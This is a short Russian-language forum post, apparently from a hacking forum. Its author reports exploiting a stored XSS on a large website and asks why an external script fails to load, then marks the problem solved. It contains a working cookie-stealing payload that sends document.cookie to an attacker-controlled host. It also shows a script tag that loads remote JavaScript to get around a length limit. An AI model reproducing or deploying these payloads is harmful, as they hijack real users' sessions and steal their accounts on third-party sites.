Нашел на одном крупненьком ресурсе XSS активку, копирнул скрипт снифера, сохранил. <script>img = new Image();img.src="http://шелл/data.php?"+document.cookie;</script>работает, и пишет куки. но на этом сайте ограничилово по знакам. по-этому пишу - <script src=http://*******/js.js></script> в js.js но он, ничего не снифает. в чем трабла? проблема решена